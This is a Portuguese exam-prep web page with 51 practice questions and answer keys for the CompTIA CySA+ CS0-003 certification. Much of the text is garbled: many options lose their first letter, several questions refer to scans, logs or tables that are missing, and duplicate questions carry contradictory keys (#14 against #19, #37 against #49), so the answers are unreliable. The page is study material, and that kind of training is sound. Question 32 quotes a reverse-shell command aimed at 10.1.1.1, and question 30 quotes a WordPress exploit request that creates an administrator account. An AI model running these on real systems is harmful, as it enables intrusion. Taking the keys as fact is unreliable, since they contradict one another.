NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Sucesso no exame CompTIA CySA+ com os testes práticos CS0-003

A certificação CySA+ foi concebida para profissionais de cibersegurança responsáveis pela deteção, prevenção e resposta a incidentes através da monitorização contínua da segurança. As perguntas do nosso exame abrangem uma ampla gama de tópicos cruciais para a certificação CySA+, incluindo deteção de ameaças, análise de dados, gerenciamento de vulnerabilidades e muito mais. Fornecemos recursos valiosos de preparação para o exame, como materiais de estudo e guias de exame. Estes recursos são cuidadosamente elaborados para o ajudar a aprofundar a sua compreensão dos conceitos-chave e a melhorar a sua preparação para o exame. Para melhorar ainda mais a sua preparação, utilize os nossos exames de simulação. Esses testes práticos reproduzem o ambiente do exame, permitindo que você avalie seus conhecimentos e habilidades antes do exame real. Com o nosso apoio, passar no exame CompTIA Cybersecurity Analyst (CySA+) CS0-003 e obter sua certificação está bem ao seu alcance.
Faça outros exames online

Pergunta #1
A equipa de segurança analisa um servidor Web em busca de XSS e executa a seguinte análise do Nmap: Qual das seguintes opções descreve mais corretamente o resultado da análise?
A. Uma saída de caracteres > e " como os parâmetros utilizados na tentativa
B. O parâmetro vulnerável ID http://172
C. parâmetro vulnerável e os caracteres não filtrados ou codificados passaram > e " como inseguros
D. O parâmetro vulnerável e os caracteres > e " com uma tentativa de XSS reflectida
Ver resposta
Resposta correta: D
Pergunta #2
Uma empresa está a implementar um programa de gestão de vulnerabilidades e existem preocupações quanto a conceder à equipa de segurança acesso a dados sensíveis. Qual dos seguintes métodos de verificação pode ser implementado para reduzir o acesso aos sistemas e, ao mesmo tempo, fornecer os resultados mais exactos da verificação de vulnerabilidades?
A. Verificação de rede com credenciais
B. Varrimento passivo
C. Análise baseada em agentes
D. Exploração dinâmica
Ver resposta
Resposta correta: C
Pergunta #3
Uma equipa de resposta a incidentes recebe um alerta para iniciar uma investigação de uma falha na Internet. A interrupção está a impedir que todos os utilizadores em vários locais acedam a recursos SaaS externos. A equipa determina que a organização foi afetada por um ataque DDoS. Qual dos seguintes registos deve a equipa analisar primeiro?
A. DN
B. Verificador de vulnerabilidades
C. NS
D. Servidor Web
Ver resposta
Resposta correta: C
Pergunta #4
Uma empresa que tem uma força de trabalho geograficamente diversificada e IPs dinâmicos quer implementar um método de verificação de vulnerabilidades com tráfego de rede reduzido. Qual das opções a seguir atenderia melhor a esse requisito?
A. Externo
B. Baseado em agentes
C. Não acreditado
D. redenciado
Ver resposta
Resposta correta: B
Pergunta #5
Uma empresa está a implementar um programa de gestão de vulnerabilidades e a passar de um ambiente no local para um ambiente de nuvem IaaS híbrido. Quais das seguintes implicações devem ser consideradas no novo ambiente híbrido?
A. Os scanners actuais devem ser migrados para a nuvem
B. As configurações incorrectas específicas da nuvem podem não ser detectadas pelos scanners actuais
C. Os scanners de vulnerabilidades existentes não podem analisar os sistemas IaaS
D. As verificações de vulnerabilidade em ambientes de nuvem devem ser realizadas a partir da nuvem
Ver resposta
Resposta correta: B
Pergunta #6
Uma equipa de segurança realiza uma reunião de lições aprendidas depois de ter dificuldades em determinar quem deve conduzir os passos seguintes após um evento de segurança. Qual das seguintes opções a equipa deve criar para resolver este problema?
A. Acordo de nível de serviço
B. Plano de gestão das alterações
C. Plano de resposta a incidentes
D. Memorando de entendimento
Ver resposta
Resposta correta: C
Pergunta #7
Uma equipa de resposta a incidentes encontrou IoCs num servidor crítico. A equipa precisa de isolar e recolher provas técnicas para investigação posterior. Qual dos seguintes dados deve ser coletado primeiro para preservar informações confidenciais antes de isolar o servidor?
A. Disco rígido
B. artição de arranque primária
C. Ficheiros maliciosos
D. Tabela de encaminhamento
E. Endereço IP estático
Ver resposta
Resposta correta: D
Pergunta #8
Um servidor Web virtual num conjunto de servidores foi infetado com malware depois de um analista ter utilizado a Internet para pesquisar um problema do sistema. Depois de o servidor ter sido reconstruído e adicionado novamente ao conjunto de servidores, os utilizadores relataram problemas com o Web site, indicando que o site não era de confiança. Qual das seguintes é a causa mais provável do problema do servidor?
A. O servidor foi configurado para utilizar SSL para transmitir dados de forma segura
B. O servidor estava a suportar protocolos TLS fracos para ligações de clientes
C. O malware infectou todos os servidores Web da pool
D. O certificado digital no servidor Web foi auto-assinado
Ver resposta
Resposta correta: D
Pergunta #9
Foi publicada uma vulnerabilidade de injeção de comandos de dia zero. Um administrador de segurança está a analisar os seguintes registos em busca de provas de adversários que tentaram explorar a vulnerabilidade: Qual das seguintes entradas de registo fornece provas da tentativa de exploração?
A. Entrada de registo 1
B. Registo de entrada 2
C. egisto de entrada 3
D. Entrada de registo 4
Ver resposta
Resposta correta: A
Pergunta #10
O chefe de uma equipa de cibersegurança está a desenvolver métricas para apresentar nos relatórios semanais dos executivos. Os executivos estão interessados em saber quanto tempo é necessário para impedir a propagação de malware que entra na rede. Qual das seguintes métricas deve o chefe de equipa incluir nos briefs?
A. Tempo médio entre falhas
B. Tempo médio de deteção
C. Tempo médio para remediar
D. Tempo médio de contenção
Ver resposta
Resposta correta: D
Pergunta #11
Um analista de cibersegurança repara numa atividade invulgar de análise de rede proveniente de um país com o qual a empresa não tem relações comerciais. Qual das seguintes é a melhor técnica de atenuação?
A. Bloquear geograficamente o país de origem da infração
B. loquear o intervalo de IP dos exames na firewall da rede
C. Efetuar uma análise de tendências históricas e procurar actividades de digitalização semelhantes
D. loquear o endereço IP específico dos exames na firewall da rede
Ver resposta
Resposta correta: B
Pergunta #12
Qual das seguintes fases da Cyber Kill Chain envolve a tentativa do adversário de estabelecer comunicação com um alvo explorado com sucesso?
A. Comando e controlo
B. Acções relativas aos objectivos
C. Exploração
D. Entrega
Ver resposta
Resposta correta: A
Pergunta #13
Uma equipa de resposta a incidentes terminou a resposta a um incidente de segurança significativo. A equipa de gestão pediu ao analista principal que apresentasse um relatório pós-ação que incluísse as lições aprendidas. Qual das seguintes é a razão mais provável para incluir as lições aprendidas?
A. Para cumprir os requisitos regulamentares relativos à comunicação de incidentes
B. Responsabilizar os outros serviços
C. Identificar áreas de melhoria no processo de resposta a incidentes
D. Destacar as práticas notáveis da equipa de resposta a incidentes da organização
Ver resposta
Resposta correta: C
Pergunta #14
O Diretor Executivo de uma organização ouviu recentemente que a exploração de novos ataques no sector estava a acontecer aproximadamente 45 dias após o lançamento de um patch. Qual das seguintes opções protegeria melhor essa organização?
A. Um tempo médio de reparação de 30 dias
B. Um tempo médio de deteção de 45 dias
C. Um tempo médio de resposta de 15 dias
D. Teste de aplicações de terceiros
Ver resposta
Resposta correta: A
Pergunta #15
Patches para duas vulnerabilidades altamente exploradas foram lançados na mesma tarde de sexta-feira. As informações sobre os sistemas e as vulnerabilidades são mostradas nas tabelas abaixo:Qual das seguintes opções o analista de segurança deve priorizar para correção?
A. ogers
B. rady
C. rees
D. anning
Ver resposta
Resposta correta: B
Pergunta #16
Ao rever os registos do servidor Web, um analista repara em várias entradas com os mesmos carimbos de hora, mas todas contêm caracteres estranhos na linha de pedido. Qual das seguintes etapas deve ser seguida?
A. Desligar imediatamente a rede e contactar a pessoa seguinte na cadeia de comando
B. Determinar de que ataque os caracteres estranhos são indicativos
C. Utilizar a estrutura de ataque correcta e determinar em que consistirá a resposta ao incidente
D. Notificar as autoridades policiais locais para dar resposta ao incidente
Ver resposta
Resposta correta: B
Pergunta #17
Durante um incidente, um analista precisa de obter provas para posterior investigação. Qual dos seguintes elementos deve ser recolhido em primeiro lugar num sistema informático, em função do seu nível de volatilidade?
A. Conteúdo do disco
B. Cópia de segurança dos dados
C. icheiros temporários
D. rocessos em execução
Ver resposta
Resposta correta: D
Pergunta #18
Um analista de segurança está a escrever um script de shell para identificar endereços IP do mesmo país. Qual das seguintes funções ajudaria o analista a atingir o objetivo?
A. unction w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. unction x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. unction y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. unction z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Ver resposta
Resposta correta: B
Pergunta #19
O Diretor Executivo de uma organização ouviu recentemente que a exploração de novos ataques no sector estava a acontecer aproximadamente 45 dias após o lançamento de um patch. Qual das seguintes opções protegeria melhor essa organização?
A. Um tempo médio de reparação de 30 dias
B. Um tempo médio de deteção de 45 dias
C. Um tempo médio de resposta de 15 dias
D. Teste de aplicações de terceiros
Ver resposta
Resposta correta: C
Pergunta #20
Um CVE mais antigo com uma pontuação de vulnerabilidade de 7,1 foi elevado para uma pontuação de 9,8 devido a um exploit amplamente disponível que está a ser utilizado para distribuir ransomware. Qual dos seguintes factores um analista comunicaria mais provavelmente como a razão para este aumento?
A. Âmbito de aplicação
B. Armação
C. VSS
D. Valor do ativo
Ver resposta
Resposta correta: B
Pergunta #21
Um funcionário acedeu a um site que fez com que um dispositivo fosse infetado com malware invasivo. O analista de resposta a incidentes:? criou o registo inicial de evidências.? desactivou o adaptador sem fios no dispositivo.? entrevistou o funcionário, que não conseguiu identificar o Web site a que acedeu.? analisou os registos de tráfego de proxy Web. Qual das seguintes medidas deve o analista tomar para remediar o dispositivo infetado?
A. Actualize o firmware do sistema e faça uma nova imagem do hardware
B. Instalar um scanner de malware adicional que enviará alertas de e-mail para o analista
C. Configurar o sistema para utilizar um servidor proxy para aceder à Internet
D. Eliminar o perfil de utilizador e restaurar os dados a partir da cópia de segurança
Ver resposta
Resposta correta: A
Pergunta #22
Um analista de segurança precisa de garantir que os sistemas da organização são protegidos com base na sensibilidade do conteúdo que cada sistema aloja. O analista está a trabalhar com os respectivos proprietários de sistemas para ajudar a determinar a melhor metodologia que procura promover a confidencialidade, disponibilidade e integridade dos dados alojados. Qual das seguintes opções o analista de segurança deve executar primeiro para categorizar e priorizar os respectivos sistemas?
A. ntrevistar os utilizadores que acedem a estes sistemas
B. Analisar os sistemas para ver que vulnerabilidades existem atualmente
C. onfigurar alertas para explorações de dia zero específicas do fornecedor
D. eterminar o valor do ativo de cada sistema
Ver resposta
Resposta correta: D
Pergunta #23
As contas de utilizador de uma empresa foram comprometidas. Os utilizadores também relatam que o portal interno da empresa é, por vezes, apenas acessível através de HTTP, outras vezes é acessível através de HTTPS. Qual das seguintes opções descreve mais provavelmente a atividade observada?
A. Existe um problema com o certificado SSL que faz com que a porta 443 fique indisponível para acesso HTTPS
B. Um ataque on-path está a ser realizado por alguém com acesso interno que força os utilizadores a entrarem na porta 80
C. O servidor Web não consegue lidar com uma quantidade crescente de pedidos HTTPS, pelo que reencaminha os utilizadores para a porta 80
D. Um erro foi causado pelo BGP devido a novas regras aplicadas nos routers internos da empresa
Ver resposta
Resposta correta: B
Pergunta #24
Durante uma pausa prolongada para férias, uma empresa sofreu um incidente de segurança. Esta informação foi devidamente transmitida ao pessoal adequado em tempo útil e o servidor estava atualizado e configurado com auditoria e registo adequados. O Diretor de Segurança da Informação quer saber exatamente o que aconteceu. Qual das seguintes acções deve o analista tomar em primeiro lugar?
A. lonar o servidor virtual para análise forense
B. Entrar no servidor afetado e iniciar a análise dos registos
C. estaurar a partir da última cópia de segurança conhecida como boa para confirmar que não houve perda de conetividade
D. esligar imediatamente o servidor afetado
Ver resposta
Resposta correta: A
Pergunta #25
Uma equipe de nuvem recebeu um alerta de que recursos não autorizados estavam sendo provisionados automaticamente. Depois de investigar, a equipe suspeita que a criptomineração esteja ocorrendo. Qual dos indicadores a seguir provavelmente levaria a equipe a essa conclusão?
A. Elevada utilização de GPU
B. Consumo de largura de banda
C. Alterações não autorizadas
D. Picos de tráfego invulgares
Ver resposta
Resposta correta: A
Pergunta #26
Qual das seguintes opções um analista de segurança usaria mais provavelmente para comparar TTPs entre diferentes adversários conhecidos de uma organização?
A. ITRE ATT&CK
B. Cyber Kill Cham
C. WASP
D. TIX/TAXII
Ver resposta
Resposta correta: A
Pergunta #27
Os novos funcionários de uma organização têm ligado consistentemente webcams pessoais, apesar da política da empresa proibir a utilização de dispositivos pessoais. O gerente de SOC descobre que os novos funcionários não estão cientes da política da empresa. Qual das seguintes opções o gerente de SOC provavelmente recomendará para ajudar a garantir que os novos funcionários sejam responsáveis por seguir a política da empresa?
A. Os recursos humanos devem enviar por correio eletrónico uma cópia de um acordo de utilizador a todos os novos funcionários
B. Os supervisores devem obter uma confirmação verbal dos novos empregados indicando que leram o acordo de utilização
C. Todos os novos funcionários devem fazer um teste sobre a política de segurança da empresa durante o processo de integração
D. Todos os novos funcionários têm de assinar um acordo de utilizador para reconhecer a política de segurança da empresa
Ver resposta
Resposta correta: D
Pergunta #28
Um analista de segurança está a tentar identificar possíveis endereços de rede de diferentes redes de origem pertencentes à mesma empresa e região. Qual das seguintes funções de script de shell poderia ajudar a atingir o objetivo?
A. unction w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. unction x() { b=traceroute -m 40 $1 | awk 'END{print $1}'') && echo "$1 | $b" }
C. unction y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. unction z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver resposta
Resposta correta: C
Pergunta #29
Um técnico identifica uma vulnerabilidade num servidor e aplica uma correção de software. Qual das seguintes opções deve ser o próximo passo no processo de correção?
A. Ensaios
B. Aplicação
C. Validação
D. Reversão
Ver resposta
Resposta correta: C
Pergunta #30
Um analista recebeu uma notificação de evento IPS do SIEM informando que um endereço IP, que se sabe ser malicioso, tentou explorar uma vulnerabilidade de dia zero em vários servidores Web. A exploração continha o seguinte snippet:/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administratorQual dos seguintes controlos funcionaria melhor para mitigar o ataque representado por este snippet?
A. Limitar a criação de utilizadores apenas aos administradores
B. Limitar a criação de layouts apenas aos administradores
C. Definir o diretório trx_addons como só de leitura para todos os utilizadores
D. Definir o diretório V2 como só de leitura para todos os utilizadores
Ver resposta
Resposta correta: A
Pergunta #31
Qual das seguintes é a melhor métrica para uma organização se concentrar, dados os investimentos recentes em SIEM, SOAR e um sistema de bilhética?
A. Tempo médio de deteção
B. Número de explorações por tática
C. Volume de alerta
D. Quantidade de tentativas de intrusão
Ver resposta
Resposta correta: A
Pergunta #32
Um analista de segurança detecta uma tentativa de exploração que contém o seguinte comando:sh -i >& /dev/udp/10.1.1.1/4821 0>$lQual das seguintes opções está a ser tentada?
A. CE
B. Concha invertida
C. SS
D. Injeção de SQL
Ver resposta
Resposta correta: B
Pergunta #33
Um analista de segurança está a realizar uma investigação que envolve vários binários de malware para Windows. O analista quer reunir informações sem revelar informações aos atacantes. Qual das seguintes acções permitiria ao analista atingir o objetivo?
A. Transferir o binário para uma caixa de areia com espaço aéreo para análise
B. nviar os binários para o fornecedor de antivírus
C. Executar os binários num ambiente com ligação à Internet
D. Consultar os hashes dos ficheiros utilizando o VirusTotal
Ver resposta
Resposta correta: A
Pergunta #34
Um analista de segurança está a tentar identificar possíveis endereços de rede de diferentes redes de origem pertencentes à mesma empresa e região. Qual das seguintes funções de script de shell poderia ajudar a atingir o objetivo?
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}'') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver resposta
Resposta correta: C
Pergunta #35
Qual das seguintes opções ajudaria a minimizar o envolvimento humano e a melhorar o processo nas operações de segurança?
A. SSTMM
B. SIEM
C. OAR
D. OWASP
Ver resposta
Resposta correta: C
Pergunta #36
Um analista repara que há um dispositivo interno a enviar tráfego HTTPS com caracteres adicionais no cabeçalho para um IP sabidamente malicioso noutro país. Qual das seguintes opções descreve o que o analista notou?
A. Balizamento
B. Scripting entre sítios
C. Estouro da memória intermédia
D. HP traversal
Ver resposta
Resposta correta: A
Pergunta #37
Um analista de segurança obteve a seguinte tabela de resultados de uma avaliação de vulnerabilidade recente que foi realizada contra um único servidor Web no ambiente: Qual das seguintes opções deve ser concluída primeiro para corrigir as descobertas?
A. Pedir à equipa de desenvolvimento Web para atualizar o conteúdo da página
B. Adicionar a lista de permissões de endereços IP para acesso ao painel de controlo
C. dquirir um certificado adequado de uma CA de raiz fiável
D. Efetuar a higienização adequada de todos os campos
Ver resposta
Resposta correta: D
Pergunta #38
Durante uma análise de segurança, um analista de segurança encontra regularmente as mesmas vulnerabilidades numa aplicação crítica. Qual das seguintes recomendações mitigaria melhor este problema se fosse aplicada ao longo da fase SDLC?
A. Sistemas proprietários
B. Sistemas antigos
C. Sistemas operativos não suportados
D. Falta de janelas de manutenção
Ver resposta
Resposta correta: C
Pergunta #39
Ao iniciar uma investigação, qual das seguintes acções deve ser realizada em primeiro lugar?
A. Notificar as autoridades policiais
B. Proteger o local
C. Apreender todas as provas relacionadas
D. Interrogar as testemunhas
Ver resposta
Resposta correta: B
Pergunta #40
Quais das seguintes tarefas de operações de segurança são ideais para automatização?
A. nálise de ficheiros suspeitos:Procurar gráficos de aspeto suspeito numa pasta
B. Acções de bloqueio de IoC da firewall:Examinar os registos da firewall em busca de IoCs da exploração de dia zero publicada mais recentementeTomar medidas de atenuação na firewall para bloquear o comportamento encontrado nos registosAcompanhar quaisquer falsos positivos causados pelas regras de bloqueio
C. rros do utilizador da aplicação de segurança:Procurar nos registos de erros sinais de utilizadores com problemas com a aplicação de segurançaLocalizar o número de telefone do utilizadorChamar o utilizador para o ajudar com quaisquer questões sobre a utilização da aplicação
D. Análise do cabeçalho do correio eletrónico:Verificar se o cabeçalho do correio eletrónico tem uma métrica de confiança de phishing superior ou igual a cincoAdicionar o domínio do remetente à lista de bloqueioMover o correio eletrónico para a quarentena
Ver resposta
Resposta correta: D
Pergunta #41
Um analista de segurança está a analisar uma captura de pacotes no Wireshark que contém uma sessão FTP de uma máquina potencialmente comprometida. O analista define o seguinte filtro de exibição: ftp. O analista pode ver que há várias solicitações RETR com respostas completas de 226 Transfer, mas o painel de lista de pacotes não está mostrando os pacotes que contêm a transferência de arquivo em si. Qual das seguintes opções o analista pode executar para ver todo o conteúdo dos arquivos transferidos?
A. lterar o filtro de visualização para ftp
B. Alterar o filtro de visualização para tcp
C. Alterar o filtro de visualização para ftp-data e seguir os fluxos TCP
D. Navegue até ao menu Ficheiro e seleccione FTP na opção Exportar objectos
Ver resposta
Resposta correta: C
Pergunta #42
Uma organização efectuou uma avaliação de vulnerabilidades de uma aplicação Web no seu sítio Web corporativo, tendo sido observados os seguintes resultados: Qual das seguintes recomendações de afinação deve o analista de segurança partilhar?
A. Definir um sinalizador HttpOnly para forçar a comunicação por HTTPS
B. loquear pedidos sem um cabeçalho X-Frame-Options
C. onfigurar um cabeçalho Access-Control-Allow-Origin para domínios autorizados
D. esativar o cabeçalho de partilha de recursos entre origens
Ver resposta
Resposta correta: C
Pergunta #43
Um analista de cibersegurança repara numa atividade invulgar de análise de rede proveniente de um país com o qual a empresa não tem relações comerciais. Qual das seguintes é a melhor técnica de atenuação?
A. Bloquear geograficamente o país de origem da infração
B. Bloquear o intervalo de IPs dos exames na firewall da rede
C. Efetuar uma análise de tendências históricas e procurar actividades de digitalização semelhantes
D. Bloquear o endereço IP específico dos exames na firewall da rede
Ver resposta
Resposta correta: B
Pergunta #44
Um programa de segurança conseguiu obter uma melhoria de 30% no MTTR através da integração de controlos de segurança num SIEM. O analista já não tinha de andar a saltar entre ferramentas. Qual das seguintes opções descreve melhor o que o programa de segurança fez?
A. Enriquecimento de dados
B. Plano de controlo de segurança
C. Combinação de alimentação de ameaças
D. Vidraça única
Ver resposta
Resposta correta: D
Pergunta #45
Qual das seguintes ferramentas funcionaria melhor para evitar a exposição de informações de identificação pessoal fora de uma organização?
A. AM
B. DS
C. KI
D. LP
Ver resposta
Resposta correta: D
Pergunta #46
A equipa de segurança de uma empresa está a atualizar uma secção da política de comunicação que diz respeito à utilização inadequada de recursos (por exemplo, um funcionário que instala criptomineradores em estações de trabalho no escritório). Para além da equipa de segurança, a qual dos seguintes grupos deve ser enviado o problema em primeiro lugar, de modo a cumprir as melhores práticas da indústria?
A. Serviço de assistência
B. Aplicação da lei
C. Departamento jurídico
D. Membro do Conselho de Administração
Ver resposta
Resposta correta: C
Pergunta #47
Uma organização sofreu uma violação de transacções de clientes. De acordo com os termos do PCI DSS, a qual dos seguintes grupos a organização deve comunicar a violação?
A. Conselho de Normas de Segurança PCI
B. Aplicação da lei local
C. Aplicação da lei federal
D. Emissor do cartão
Ver resposta
Resposta correta: D
Pergunta #48
Um analista de segurança tem a tarefa de dar prioridade às vulnerabilidades para correção. As políticas de segurança relevantes da empresa são mostradas abaixo:Política de Segurança 1006: Gestão de Vulnerabilidades1. A Empresa deve usar a métrica de pontuação base CVSSv3.1 (explorabilidade e impacto) para priorizar a correção de vulnerabilidades de segurança.2. Em situações em que uma escolha deve ser feita entre confidencialidade e disponibilidade, a Empresa deve priorizar a confidencialidade dos dados sobre a disponibilidade de sistemas e dados.3. A Com
A. ome: THOR
B. ome: CAP
C. ome: LOKI
D. ome: THANOS
Ver resposta
Resposta correta: B
Pergunta #49
Um analista de segurança obteve a seguinte tabela de resultados de uma avaliação de vulnerabilidade recente que foi realizada contra um único servidor Web no ambiente: Qual das seguintes opções deve ser concluída primeiro para corrigir as descobertas?
A. Pedir à equipa de desenvolvimento Web para atualizar o conteúdo da página
B. Adicionar a lista de permissões de endereços IP para acesso ao painel de controlo
C. Adquirir um certificado adequado de uma CA de raiz fiável
D. Efetuar a higienização adequada de todos os campos
Ver resposta
Resposta correta: C
Pergunta #50
Um utilizador descarrega software que contém malware para um computador que acaba por infetar vários outros sistemas. Em qual das seguintes situações o utilizador se tornou?
A. Hacktivista
B. Ameaça persistente avançada
C. Ameaça interna
D. Script kiddie
Ver resposta
Resposta correta: D
Pergunta #51
Um analista de segurança tem de preservar um disco rígido do sistema que esteve envolvido num pedido de litígio. Qual das seguintes opções é o melhor método para garantir que os dados no dispositivo não sejam modificados?
A. Gerar um valor de hash e criar uma imagem de cópia de segurança
B. Encriptar o dispositivo para garantir a confidencialidade dos dados
C. roteger o dispositivo com uma palavra-passe complexa
D. fetuar um despejo de memória para recolher dados residuais
Ver resposta
Resposta correta: A

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: